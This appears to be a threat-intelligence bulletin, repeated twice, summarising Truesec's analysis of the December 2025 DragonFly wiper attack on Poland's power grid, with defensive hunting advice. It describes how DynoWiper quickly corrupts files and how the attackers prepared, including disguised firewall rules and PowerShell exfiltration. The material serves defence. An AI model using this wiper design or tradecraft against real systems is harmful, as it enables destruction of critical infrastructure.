Detecting Russian Threats to Critical Energy Infrastructure
Summary:
According to researchers at Truesec, the December 2025 cyberattack on the Polish electrical grid marks a significant shift in Russian cyber warfare, specifically attributed to the threat actor DragonFly. While this group has historically focused on long-term espionage and pre-positioning within Western infrastructure, this event represents their first known transition into destructive operations against a NATO member's energy sector.
The attack utilized sophisticated wiper malware, such as DynoWiper, to target grid connection points and thermal power plants, signaling that Russia has crossed a critical threshold in its willingness to disrupt life-sustaining services outside of Ukraine. Unlike some complex industrial malware, DynoWiper is functionally straightforward but optimized for speed and maximum destruction of the IT environment:
Security Officer Comments:
The potential impact of such attacks is severe, with Polish authorities estimating that the December incident could have left up to 500,000 people without electricity and heating in a worst-case scenario. Beyond the immediate loss of utility services, the technical impact involves the permanent or long-term disabling of Operational Technology (OT) equipment. By overwriting firmware on Remote Terminal Units (RTUs) with corrupted data and using wipers to destroy Human-Machine Interface (HMI) systems, the attackers aim to inhibit system recovery, forcing utilities to physically replace hardware rather than simply rebooting systems.
The 2025-2026 cyberattack on the Polish energy grid serves as a warning for the United States. It demonstrates that Russian state actors (DragonFly/Sandworm) are no longer merely mapping NATO infrastructure for intelligence; they have shifted to active destructive operations designed to cause civilian casualties and civil unrest.
A major takeaway is the shift from targeting centralized power plants to the distributed edge of the grid. The attackers hit over 30 renewable energy farms (wind and solar) by targeting the grid connection points that transfer power to the national system. As the US shifts to a greener grid, smaller, decentralized sites often have weaker security than massive nuclear or coal plants. These sites often fall below federal regulatory thresholds (like NERC CIP), making them soft targets.
There are also concerns about the US’s readiness for non-repairable equipment damage. By overwriting the firmware on Remote Terminal Units (RTUs), the attackers made the devices physically non-functional. These are not reboot and restore fixes; they require the physical replacement of hardware. The US must evaluate its supply chain resilience and spare parts inventory. If a coordinated attack hit 50 US substations simultaneously, there are questions on the availability of physical RTUs and trained technicians available to restore the grid.
Suggested Corrections:
To mitigate these threats, Truesec recommends a shift toward behavior-based detection and proactive threat hunting rather than relying solely on static indicators. Organizations should implement YARA rules designed to identify the specific mathematical constants used by DynoWiper's random-number generators and monitor for suspicious ELF binaries that signal firmware corruption. Additionally, defenders should hunt for preparatory activities, such as the unauthorized enabling of administrative shares (AutoShareWks/Server) and the creation of misleading firewall rules (e.g., naming a rule "Microsoft Update" to allow SMB traffic). Comprehensive monitoring of PowerShell commands, specifically those used for data exfiltration via HTTP POST or service restarts, is essential for evicting these actors before they reach the destructive phase of their mission.
Link(s):
https://www.truesec.com/hub/blog/detecting-russian-threats-to-critical-energy-infrastructure
According to researchers at Truesec, the December 2025 cyberattack on the Polish electrical grid marks a significant shift in Russian cyber warfare, specifically attributed to the threat actor DragonFly. While this group has historically focused on long-term espionage and pre-positioning within Western infrastructure, this event represents their first known transition into destructive operations against a NATO member's energy sector.
The attack utilized sophisticated wiper malware, such as DynoWiper, to target grid connection points and thermal power plants, signaling that Russia has crossed a critical threshold in its willingness to disrupt life-sustaining services outside of Ukraine. Unlike some complex industrial malware, DynoWiper is functionally straightforward but optimized for speed and maximum destruction of the IT environment:
- To speed up the destruction process, the malware does not overwrite entire files. Instead, it uses a Mersenne Twister pseudorandom number generator to overwrite the first 16 bytes (the header) of a file. For larger files, it generates up to 4,096 random offsets and overwrites each with 16-byte sequences of random data, ensuring the files are unrecoverable without the time-consuming process of a full wipe.
- It recursively scans all logical drives (A-Z), specifically targeting "Fixed" (hard drives) and "Removable" (USB/SD cards) media.
- It deliberately skips critical system folders like C:\Windows, C:\Program Files, and C:\Boot. This is a calculated tactic to keep the operating system running just long enough for the malware to finish wiping user data before the system inevitably crashes.
- Once the wiping cycle is complete, the malware obtains administrative shutdown privileges and forces an immediate system reboot to finalize the disruption.
Security Officer Comments:
The potential impact of such attacks is severe, with Polish authorities estimating that the December incident could have left up to 500,000 people without electricity and heating in a worst-case scenario. Beyond the immediate loss of utility services, the technical impact involves the permanent or long-term disabling of Operational Technology (OT) equipment. By overwriting firmware on Remote Terminal Units (RTUs) with corrupted data and using wipers to destroy Human-Machine Interface (HMI) systems, the attackers aim to inhibit system recovery, forcing utilities to physically replace hardware rather than simply rebooting systems.
The 2025-2026 cyberattack on the Polish energy grid serves as a warning for the United States. It demonstrates that Russian state actors (DragonFly/Sandworm) are no longer merely mapping NATO infrastructure for intelligence; they have shifted to active destructive operations designed to cause civilian casualties and civil unrest.
A major takeaway is the shift from targeting centralized power plants to the distributed edge of the grid. The attackers hit over 30 renewable energy farms (wind and solar) by targeting the grid connection points that transfer power to the national system. As the US shifts to a greener grid, smaller, decentralized sites often have weaker security than massive nuclear or coal plants. These sites often fall below federal regulatory thresholds (like NERC CIP), making them soft targets.
There are also concerns about the US’s readiness for non-repairable equipment damage. By overwriting the firmware on Remote Terminal Units (RTUs), the attackers made the devices physically non-functional. These are not reboot and restore fixes; they require the physical replacement of hardware. The US must evaluate its supply chain resilience and spare parts inventory. If a coordinated attack hit 50 US substations simultaneously, there are questions on the availability of physical RTUs and trained technicians available to restore the grid.
Suggested Corrections:
To mitigate these threats, Truesec recommends a shift toward behavior-based detection and proactive threat hunting rather than relying solely on static indicators. Organizations should implement YARA rules designed to identify the specific mathematical constants used by DynoWiper's random-number generators and monitor for suspicious ELF binaries that signal firmware corruption. Additionally, defenders should hunt for preparatory activities, such as the unauthorized enabling of administrative shares (AutoShareWks/Server) and the creation of misleading firewall rules (e.g., naming a rule "Microsoft Update" to allow SMB traffic). Comprehensive monitoring of PowerShell commands, specifically those used for data exfiltration via HTTP POST or service restarts, is essential for evicting these actors before they reach the destructive phase of their mission.
Link(s):
https://www.truesec.com/hub/blog/detecting-russian-threats-to-critical-energy-infrastructure